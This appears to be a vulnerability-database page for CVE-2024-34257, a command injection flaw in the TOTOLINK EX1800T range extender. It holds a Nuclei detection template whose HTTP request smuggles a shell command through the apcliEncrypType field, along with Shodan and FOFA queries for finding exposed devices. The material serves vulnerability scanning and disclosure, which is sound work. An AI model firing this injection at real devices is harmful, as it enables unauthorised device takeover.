| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability of the microprogrammed Wi-Fi range extension software TOTOlink EX1800T arises from the lack of measures taken to neutralize special elements used in the operating system’s command set. This allows a hacker to execute arbitrary code and gain increased privileges. | 13 May 202400:00 | – | bdu_fstec | |
| CVE-2024-34257 | 8 May 202419:49 | – | circl | |
| TOTOLINK EX1800T 安全漏洞 | 8 May 202400:00 | – | cnnvd | |
| CVE-2024-34257 | 8 May 202400:00 | – | cve | |
| CVE-2024-34257 | 8 May 202400:00 | – | cvelist | |
| CVE-2024-34257 | 8 May 202417:15 | – | nvd | |
| CVE-2024-34257 | 8 May 202417:15 | – | osv | |
| PT-2024-3339 · Totolink · Totolink Ex1800T | 8 May 202400:00 | – | ptsecurity | |
| CVE-2024-34257 | 9 Jan 202609:36 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-34257 | 13 Aug 202400:00 | – | vulncheck_kev |
id: CVE-2024-34257
info:
name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
author: pussycat0x
severity: high
description: |
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
impact: |
Unauthenticated attackers can execute arbitrary commands via the apcliEncrypType parameter, gaining device administrator privileges.
remediation: |
Update TOTOLINK EX1800T firmware to a version that patches the command injection vulnerability.
reference:
- https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
- https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
- https://github.com/20142995/nuclei-templates
classification:
epss-score: 0.03848
epss-percentile: 0.88867
metadata:
vendor: totolink
product: a3700r_firmware
shodan-query: http.title:"totolink"
fofa-query: title="totolink"
google-query: intitle:"totolink"
tags: cve,cve2024,rce,unauth,vkev,vuln
variables:
file: "{{rand_base(6)}}"
http:
- raw:
- |
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/page/index.html
{
"token":"",
"apcliEncrypType":"`id>../{{file}}.txt`",
"topicurl":"setWiFiExtenderConfig"
}
- |
GET /{{file}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '"success": true'
- type: regex
part: body_2
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100c55a8f1251ae4f9df629aaf1f46a94d55dbb62f692374c4cd21d74165befb7d202205bd404b3f0b8b5854bd5dbb7710a92ac5a046cf1e820fe1924cf4de36ec0f6c1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation